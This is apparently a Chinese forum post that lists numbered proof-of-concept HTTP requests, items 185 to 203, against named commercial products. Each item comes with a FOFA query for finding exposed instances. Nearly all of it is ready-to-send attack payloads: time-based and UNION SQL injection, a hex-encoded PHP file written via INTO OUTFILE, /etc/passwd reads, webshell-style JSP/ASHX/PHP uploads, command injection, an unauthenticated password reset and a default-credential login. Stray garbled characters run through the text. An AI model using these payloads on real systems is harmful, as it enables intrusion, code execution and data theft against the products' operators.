( }0 C& z. A- P1 H$ q ^1 u: H185. 瑞友天翼应用虚拟化系统SQL注入( ~. P9 [1 t5 R% t* v, L- Q
version < 7.0.5.1" ?. [: Q. {/ E
FOFA:app="REALOR-天翼应用虚拟化系统"
% [! A3 s0 K; PGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
: M2 t9 ?, `: I1 ?" W3 bHost: host
3 r1 [, Z6 }: p# p' {% E. F8 d$ @, C2 n" ~8 D2 u
$ }6 [' z$ x6 p- O2 R186. F-logic DataCube3 SQL注入
* z# x( |+ N2 ACVE-2024-31750% H8 P0 @, l7 J
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统$ h; e( ]# T# i% h
FOFA:title=="DataCube3"
9 p& c( n/ D6 i2 L; kPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1 [2 U6 F( |, t" w% P
Host: your-ip
6 [6 p( S$ |1 }1 `- V" hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0% _: ~$ x8 M0 I7 B8 C3 `, l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8% f- n; D! o1 G" K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 U- v {" H' v; e c7 f H: ]6 E
Accept-Encoding: gzip, deflate
/ B. f9 S3 d9 q+ {' X" w- r( A& B( |Connection: close
. I2 I% P- V: m2 X; |% s7 V' yContent-Type: application/x-www-form-urlencoded+ p( D( M* S* t4 o, j- |
+ A5 Y/ [+ c* z$ S
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14501 k( ^& }8 H5 R* w2 w! B: |
6 {! u+ r3 p7 R. G0 t, f1 k. `" {" `# G9 W' p: o8 _
187. Mura CMS processAsyncObject SQL注入" V5 W+ a: N, E+ }
CVE-2024-326408 K9 e: e3 X& V
FOFA:"Mura CMS") T. s! z# k: F9 d$ Z
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.12 P% r, l' s( W" m; Z9 h
Host: your-ip
8 F9 K# `: ^/ ^, nContent-Type: application/x-www-form-urlencoded: c" |. J8 q; ]- b
+ P" [( ?' Z, z* E' h- E
+ f, v2 r _7 H0 U7 [ Hobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
3 E* {4 v& H2 N3 W+ I
/ ~& t1 ], ~) I& a: j7 l1 r i$ X; G( z& }' D$ s
188. 叁体-佳会视频会议 attachment 任意文件读取
, O6 p/ m! I% |6 {: y6 eversion <= 3.9.7: G3 J0 t) i! C6 \8 H3 n$ Q o
FOFA:body="/system/get_rtc_user_defined_info?site_id"
* A( {9 N/ x) `$ q9 m4 aGET /attachment?file=/etc/passwd HTTP/1.12 X# ]+ H b) E( M+ Q+ }/ @
Host: your-ip
" U5 Q9 l, l @0 o& [ }6 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, u, M! y0 y/ w8 J* @" ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" z0 d$ o: f) L% A% `" ZAccept-Encoding: gzip, deflate U" i; Q! R/ p% |7 ^
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
9 W( ^8 y" t% q9 J0 [7 xConnection: close3 k) Z) Q7 f# ]# H/ g
# C! `4 h3 n* |5 M: w) x& ?* y' z5 X, w$ o& M, a
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
' V# G& W/ F6 J/ FFOFA:app="LANWON-临床浏览系统"' B3 m' z) ^1 v% J
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
* k! z- w' W* M6 N! ~2 C; |Host: your-ip
) ?2 R- y+ u& e. G2 b1 AUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 p: x3 w x" q: {5 s' AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) M5 u# h: Z7 T+ ]Accept-Encoding: gzip, deflate
1 ]3 v4 H1 ]9 P" H* f; vAccept-Language: zh-CN,zh;q=0.9
; |7 D6 P, f( \7 V+ ^* B- E& `Connection: close! A% }1 _6 t" ^+ J4 c
! W& u, I" i4 X6 d
1 z/ t `: `3 s) T. |) [
190. 短视频矩阵营销系统 poihuoqu 任意文件读取' `1 L. f9 G7 ?7 ]3 y
FOFA:title=="短视频矩阵营销系统". `0 c# [3 X t6 Z& S9 z
POST /index.php/admin/Userinfo/poihuoqu HTTP/2* A, b# ^7 O9 @- k. U- b
Host: your-ip8 J: I" Q& r: @8 O! o) o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
, s) X8 S* n% A2 j& jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
3 _- e! Y* f* x2 v2 ZContent-Type: application/x-www-form-urlencoded
2 z* [3 p% ^: t; n# T. SAccept-Encoding: gzip, deflate
8 I( @( ~9 P( D: |Accept-Language: zh-CN,zh;q=0.9 M7 O: [+ T8 Z+ j5 `
1 \$ `: _! J5 m3 ]" @0 Fpoi=file:///etc/passwd
/ `8 `* B, t0 _0 d" M8 W
9 Q3 P; {! S, W- z5 i2 _9 o# b# t8 j& t6 n$ K, Y$ [" X, d
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
: _; J' A! b& B2 D( s1 yFOFA:body="/CDGServer3/index.jsp"/ k# Z+ V1 ?3 J
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
. _+ ~3 o0 g( u' |Host: your-ip4 @+ F5 W! `# L0 O! x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ o: A- k( p9 V' W2 j! H& ^1 M
Content-Type: application/x-www-form-urlencoded: H! I$ p" l/ S1 N/ s0 p
3 s# s# {- I3 _. d: H. x
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=! d7 w- a5 F" p8 h
! O7 w, c7 s: B) [6 U5 w# `- l. a" O7 `8 J' h$ m0 `6 [) _
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传7 G) R- X, D. W
FOFA:title="用户登录_富通天下外贸ERP"
" `' u, A, }/ a; M4 a# BPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1$ S9 L' i' t# V- ~4 j. D
Host: your-ip
( C. o; M+ \0 l8 |, V+ qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36$ Q: x/ P1 U. U7 V8 y
Content-Type: application/x-www-form-urlencoded& s5 ^- k& s) N; T; I
. l5 q9 H( q: g3 j3 n. F9 t# p5 u6 D- R; y4 s3 } n, e
<% @ webhandler language="C#" class="AverageHandler" %>
8 Y c R& f- F& Rusing System;( g, B7 P+ W7 L3 s* f: Z8 l! y
using System.Web;' X0 p- I6 g" r' s
public class AverageHandler : IHttpHandler
+ c J; k+ {- T4 e9 u2 @ J{( x1 O. a: ?5 q6 e9 s M5 j
public bool IsReusable( C( ^% C: z8 D- f3 [" w
{ get { return true; } }8 F8 }3 i' _4 p, Z- K
public void ProcessRequest(HttpContext ctx)
4 T+ O7 L. f1 y{
0 W y+ q$ p1 a/ @6 T/ ]6 L9 jctx.Response.Write("test");
% s- n8 _9 w4 W5 w& S}
* }& _% @ c% y" W! g( p}
! [' a, A9 f6 c! l& F9 f. m' t& {6 W6 U8 r
- k) O, C% u! B+ B Z& x
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
3 @8 k3 V4 @1 I3 d# c/ [FOFA:body="山石云鉴主机安全管理系统"
5 K# _2 x% `2 B$ }# GGET /master/ajaxActions/getTokenAction.php HTTP/1.1
3 d* K# o8 o" M, iHost:
- q! F) Q' I1 I+ l# SCookie: PHPSESSID=2333333333333;+ k& B/ a7 j3 B
Content-Type: application/x-www-form-urlencoded* y$ H0 j; B% _2 z8 \- w
User-Agent: Mozilla/5.06 a* Z# E# p5 H) ] G) \5 ?" q
" L4 L6 T9 q6 Q6 S' A2 V) B' @; x/ V
1 m _& h D' J, ^POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
; v" P; c' S# k+ B* J0 |Host:# Y% v. i) |! F' @/ `8 K
User-Agent: Mozilla/5.0
8 w0 u8 y `9 J# j- D+ S8 U' i" jAccept-Encoding: gzip, deflate
+ Y6 X* \1 j+ u- L" t/ iAccept: */*4 D& O) `- W' e9 N0 A. Q8 [0 t2 G2 ^% ]
Connection: close; ?" Y+ T8 w& J; x. k' p& h
Cookie: PHPSESSID=2333333333333;
0 z) G; K) G% M$ V$ u, X9 {Content-Type: application/x-www-form-urlencoded
. ?: h( n, n3 n! VContent-Length: 841 D1 ~; X2 U7 z% j
, C. M( z# _. Yparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
! P) L. `7 |; l( v6 A0 X- E) [
/ h+ y+ U5 }7 M4 j9 l: ^, T, Z: J; E9 N3 x2 H) b7 p
GET /master/img/config HTTP/1.15 c: C J ~9 S+ T, y
Host:
0 `% S0 Y+ y) X+ ]# Z/ F, V# TUser-Agent: Mozilla/5.0
1 i. _" J" Q% S
, D& k: _; o" T. A4 R, M
( F1 D" D, {+ Q0 T5 y' |( ]& B194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传; `5 [: q# u: M- o/ Q& V+ f8 D
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
; Z- J v- G4 U- F. S# M0 G% F( [9 G. W' {$ r7 f- r
POST /servlet/uploadAttachmentServlet HTTP/1.1
9 Y" D7 k8 a7 T% Z* ^" BHost: host
. G* ? _, {5 c& d: T+ y( XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
v/ R) B4 y2 o LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 r; M( B) e3 Z- b# I. ~. jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- I! Y, `3 {) j0 T+ N- \: ~
Accept-Encoding: gzip, deflate9 {' j: H9 }- U! y
Connection: close, ], t9 p2 r1 C+ v( @7 j* [4 z E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk* R, C% F' t' a
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
, B: Y/ ?3 `# N5 ]* F7 p4 r* j& D
2 v4 z$ y: R4 S ^& f% Y/ f# b5 hContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"" \- ^* [% W% r+ e; z
Content-Type: text/plain3 C- ]% }. z" u, J& d' A, r7 U
<% out.println("hello");%>
/ E8 t: } |& q' z8 w2 N------WebKitFormBoundaryKNt0t4vBe8cX9rZk
! _7 d6 f& K- G3 R' _0 oContent-Disposition: form-data; name="json". Z/ B2 k) m F; d. i$ K4 ^5 J& t, A3 c
{"iq":{"query":{"UpdateType":"mail"}}}
) V. K$ P) I/ ^ H5 ^/ J------WebKitFormBoundaryKNt0t4vBe8cX9rZk--" C) h7 Y1 ]' F2 x$ d3 w
& A N4 u; o5 P! R! h5 n8 l
! ~5 N- ]% T% c" I3 |2 r
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行% l9 X0 ]) B* |- y
FOFA:title=="飞鱼星企业级智能上网行为管理系统" }1 G# B' D' e3 M# U! i
POST /send_order.cgi?parameter=operation HTTP/1.18 i- [' |+ y% R7 B
Host: 127.0.0.1
, O" k0 E8 ?. l1 y: @0 ^* bPragma: no-cache2 Z& `; p# O0 u: Y9 I; q
Cache-Control: no-cache9 q1 N. a8 M: }/ v: H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: Y4 t) S8 r8 D- V$ h: s* O' X6 Y% s
Accept: */*7 @! C# [- d; C* V
Accept-Encoding: gzip, deflate
4 {& r+ t* \, b- b5 s2 {Accept-Language: zh-CN,zh;q=0.9
$ b, s$ ~" K, u1 LConnection: close7 X* W' }! h' T. e2 ?
Content-Type: application/x-www-form-urlencoded
! z* i4 c. f/ Z+ Y8 c5 d- e" zContent-Length: 68
0 W- `3 y0 K# g7 j/ I+ |- @0 y% E; f3 D6 f
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
) _" K+ t& H0 L5 U0 o* l9 I, Q6 B$ y* y
; R L; G" u5 S" J
196. 河南省风速科技统一认证平台密码重置
2 `; i. j& c$ V0 EFOFA:body="/cas/themes/zbvc/js/jquery.min.js"( g5 d( e& `0 z" l- g3 x" J# z
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
" w$ G: w6 [, P2 O1 R' UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
1 T; a4 \9 |7 D1 j. e# |Content-Type: application/json;charset=UTF-82 q% E: s$ B. T
X-Requested-With: XMLHttpRequest
! M+ H; u: l' g C: v2 h; k% uHost:6 r7 t" m/ j8 J3 f G! u- s
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
5 g# V) H+ E7 Q+ FContent-Length: 45
' K6 J2 L5 h3 c7 A; J" {Connection: close E V Y1 Y5 [ ~
8 o% v3 G( u% J{"xgh":"test","newPass":"test666","email":""}
/ x/ L2 e& x/ a% [/ W4 u+ ~ q( I* j7 m( D& l, J# p
% W7 Z. J& c9 B% |. m3 J( N, ]1 @- K3 k8 @% ^: H
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
/ D) z5 H% t1 J( f) K. E- u: kFOFA:app="浙大恩特客户资源管理系统"# E3 P2 R' `+ M. O
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1: j# a- i( |* Q4 J5 u
Host:
/ G4 @0 B$ r6 S7 x7 X/ D/ ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 l; O6 S0 \, K% L
Accept-Encoding: gzip, deflate. a8 `/ M, z# p! b9 v, d+ Y, W
Connection: close
+ r% D0 W) x& {, x" W: X, Q4 d/ m) V7 W
) {$ I% Y% t, j# e, j
n0 ^: p9 W' t7 [) W3 _
198. 阿里云盘 WebDAV 命令注入
: f, G) a9 p' f3 ^, hCVE-2024-29640
% F( g4 q5 g( ~6 Y/ R! [: z4 ~7 OGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1: o) G( G' A Y- o8 H9 ~
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
/ v) w C2 s! a6 A/ [1 wAccept: */*
* O, R" k1 V4 R- ~) C2 ?5 H& FAccept-Encoding: gzip, deflate/ c/ R/ V8 x' K
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
" L2 I0 C* c+ l0 c) ?Connection: close
3 c& r7 S7 n$ w
" m8 s4 A6 }$ l5 f" ^2 e6 Q8 z, {7 c& Q( b4 K" s
199. cockpit系统assetsmanager_upload接口 文件上传% ^' j# c' G0 U( q% c
, @! z ~, |# O: o: F
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
- N9 Z* _3 y* mGET /auth/login?to=/ HTTP/1.1" W% X' N+ [4 s. R `2 r
8 u4 w5 h2 i y- O5 l响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
+ P, z$ u% y0 `- Q$ p1 @
$ K5 w% {+ \* ^" G2.使用刚才上一步获取到的jwt获取cookie:
9 ^2 w' u) `0 l* j: r5 D7 Y' \1 H( p: ~0 s5 ^
POST /auth/check HTTP/1.1
1 d/ y$ J1 }: SContent-Type: application/json5 g8 J0 p8 u3 v1 W
) d _- p) U& V5 L( ^{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
+ W, N- Z8 f* ~2 F# S5 R+ f/ L( g0 E B/ Q4 d* K4 C u
响应:200,返回值:
T2 D1 K9 `( T/ ]Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
6 U% E/ F+ }( U6 O& S) e6 sFofa:title="Authenticate Please!"
0 U4 Z9 o$ n5 B5 y+ y ~8 ?POST /assetsmanager/upload HTTP/1.1
, }" w0 c+ N+ g, F i8 PContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
2 _$ y" W- ^* O4 b# sCookie: mysession=95524f01e238bf51bb60d77ede3bea92
F/ V, ^2 X) p* M
4 w0 @5 b7 r6 U Y% h& d- X+ g3 Q-----------------------------36D28FBc36bd6feE7Fb3
$ s' m& v2 x8 R8 h4 D8 s! FContent-Disposition: form-data; name="files[]"; filename="tttt.php"
& B0 I/ }' }; V. q0 i. {6 _+ dContent-Type: text/php
( A) q# ]6 m0 m
- V% l8 N. I$ V<?php echo "tttt";unlink(__FILE__);?>9 v) X% j' R' s+ w5 d
-----------------------------36D28FBc36bd6feE7Fb36 ?3 r$ m4 P8 y* n
Content-Disposition: form-data; name="folder" S: E! ~7 n! y z4 d+ V S
+ S$ p0 Y$ b( k3 I) r( c
-----------------------------36D28FBc36bd6feE7Fb3--
4 S: r4 s* {7 O3 _/ _! V/ v H3 l* p# u0 E( H7 J
9 ^. o/ ]4 A8 a n: [/storage/uploads/tttt.php
( [% {4 Y B* z# W. x9 y! g
O9 \) @% H' M200. SeaCMS海洋影视管理系统dmku SQL注入% u2 h% K" m, h* x
FOFA:app="海洋CMS", Y" Z$ X1 @4 ?8 W& T/ ?
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.13 f' \( N' X/ Z, C3 L
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s8 u* s/ G5 D7 t
Upgrade-Insecure-Requests: 1
: H' e1 K) \. Z: _/ L; P# rCache-Control: max-age=04 t) e" y: r4 m' U4 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ @# I- L6 Z; F" NAccept-Encoding: gzip, deflate
! m$ }: ?7 x, b% O$ i$ n+ d: z) g( ^Accept-Language: zh-CN,zh;q=0.9. K$ `% y# q/ x. u
4 D/ T+ n* w6 V5 q8 U" f! ?% _' ]
9 `! W, b9 o. [( Y# Y/ M
201. 方正全媒体新闻采编系统 binary SQL注入
* o) E I0 q- i& Z. ]FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
, _: L8 \: a- B' N( P+ Y5 f( |2 uPOST /newsedit/newsplan/task/binary.do HTTP/1.1
7 K' P* W& C* [5 u0 S' ]& s$ d, {Content-Type: application/x-www-form-urlencoded
, a) g" a7 B( N& R8 o7 E: ]4 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 n* P" ~3 d0 v, Y( A5 tAccept-Encoding: gzip, deflate% z9 z: ?" n9 k* F
Accept-Language: zh-CN,zh;q=0.9
/ ?+ w8 d6 {" m+ T: W+ g; `Connection: close4 V* d! t/ _8 n s$ F4 f# d
0 l6 N& [* n% K5 e+ b
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
Q: P& w- W! B5 O. i. e
/ H: _, H. b9 u G+ C, W; {% K* @* a8 `( N. ?
202. 微擎系统 AccountEdit任意文件上传5 I! T/ u& p+ R( y; K
FOFA:body="/Widgets/WidgetCollection/"
( ?7 J- o, d5 o* x0 |& Z获取__VIEWSTATE和__EVENTVALIDATION值1 A4 k n3 s4 p6 L- S: N. _
GET /User/AccountEdit.aspx HTTP/1.1
/ U% P1 j2 v1 \0 i4 [. qHost: 滑板人之家
0 u: v9 e) |0 d. b0 V4 ?8 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
. T1 l, u& {+ d! k" uContent-Length: 03 A3 }4 i, M! F" D
5 n6 t7 Z {, t# ]
9 j+ q' s. d! D+ k' o4 F3 b替换__VIEWSTATE和__EVENTVALIDATION值
' ]& y7 S% c/ |6 t6 z" APOST /User/AccountEdit.aspx HTTP/1.1! @- @1 A$ }. P0 ~* l2 K
Accept-Encoding: gzip, deflate, br
y! y5 t, k9 JContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
, L/ I* r, f: @ R3 N4 L1 ^ e; l T& R3 h7 Z
-----------------------------786435874t38587593865736587346567358735687
; v, M# P W8 @$ \( D& }. S/ FContent-Disposition: form-data; name="__VIEWSTATE"0 V* ^) ]5 ~3 J( m: K
5 ^; Q$ [ U( L
__VIEWSTATE
$ T. s" n1 Y4 t-----------------------------786435874t38587593865736587346567358735687& D' L( M( {: y! ?9 n- R
Content-Disposition: form-data; name="__EVENTVALIDATION"
* q2 N% s6 q5 M2 W% f X y( e
4 i. }( w ` Y__EVENTVALIDATION
8 m1 W7 g5 q# r-----------------------------786435874t38587593865736587346567358735687
b$ l1 `( ?' ~; K. v5 K9 i9 rContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
- E' g8 l9 p0 p7 x2 K- ~Content-Type: text/plain
! [% M; ]7 I4 U; Z9 E/ w
1 S) r# I5 [" R q' O* ?; lHello World!
, W; s4 u' c( f6 M-----------------------------786435874t385875938657365873465673587356875 D$ B2 w, B1 n0 j4 e
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"# |) K3 d7 t, N6 K/ P9 \* t
0 w. E( t Z2 S
上传图片
5 [% \9 W* D8 ^/ C) c-----------------------------786435874t385875938657365873465673587356872 U6 F/ c" `! b) s6 O* L
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"0 G6 j8 Q* t! x
: g* G. G2 Y3 C6 X3 ]; O$ D
; j- G! z6 r/ F5 t-----------------------------786435874t38587593865736587346567358735687
h0 s+ j1 F# X8 I, Y" aContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"0 i1 S6 u1 j1 N, _' q7 I
3 X* x, t1 M: ^
* ]3 w9 @1 A; q-----------------------------786435874t38587593865736587346567358735687--, M* N- s- T1 l4 Z3 u
! I: L3 U: E4 o) M
9 s6 c/ e6 u* i9 ^7 s) M& ~4 E3 J3 }/_data/Uploads/1123.txt4 j: K) I7 m: F# w; o
2 t2 ?8 U8 C" i0 c$ _203. 红海云EHR PtFjk 文件上传' e9 ]0 M: m: R1 S' R
FOFA:body="RedseaPlatform"
! X4 P$ r# ]% Z8 W9 aPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
2 G+ l w$ x6 W5 rHost: x.x.x.x
7 s8 f% W9 j( F2 z- ] n( }Accept-Encoding: gzip& c) J% U }. Q; [" a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 a3 V: t: h1 V. K$ u. b; U; F' zContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
8 @* G0 ?; U# d- u/ ZContent-Length: 2101 `3 S4 N p0 m( w q0 \
8 n8 D7 {: I6 j) s: T6 b n
------WebKitFormBoundaryt7WbDl1tXogoZys43 Y) i1 ^1 A3 I( s+ g
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
6 m$ J) a7 i% M" F3 }) {( I; aContent-Type:image/jpeg! b! u( Z' x4 a( m
# l# @0 ]+ G. Q0 b) `<% out.print("hello,eHR");%>
* q' r; `9 H- M; N# w1 Z------WebKitFormBoundaryt7WbDl1tXogoZys4--! J1 H# i9 ?6 K8 Q) M
- S! L6 A5 V; V0 v# Q8 k1 l( n1 o
. @" D8 U* `# c+ d7 w. ^. M; @1 }" w, D
5 v! G% @* w2 ?: X( E8 L Q1 Q; O4 f z2 x, |2 D
( V* e/ W4 f* p+ a2 [4 V1 `8 Q
: D0 x& h. l- w& H$ u9 U
|
发表于 2024-6-5 14:31:29
收藏
支持
反对